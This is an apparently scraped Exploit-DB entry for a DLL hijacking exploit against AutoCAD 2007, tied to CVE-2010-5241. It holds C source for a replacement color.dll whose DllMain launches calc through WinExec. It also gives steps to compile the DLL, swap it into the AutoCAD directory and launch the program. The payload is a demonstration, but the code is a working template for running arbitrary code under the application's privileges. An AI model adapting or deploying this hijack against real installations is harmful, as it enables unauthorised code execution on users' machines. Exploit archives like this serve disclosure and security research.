Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

EDB-ID:

14793

CVE:

2010-5241

EDB Verified:

Author:

xsploited security

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2010-08-25

Vulnerable App: 
/*
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Title: Autocad 2007 Professional dll (color.dll) Hijacking exploit
Author: xsploited security
URL: http://www.x-sploited.com/
Email: xsploitedsecurity@gmail.com

Instructions:

1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
4. Boom calc!

Shoutz:

kAoTiX, Deca, Drizzle, 0xJeremy, Sheep, SpliT, all other security guru's and teams.
*/

#include <windows.h>

int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services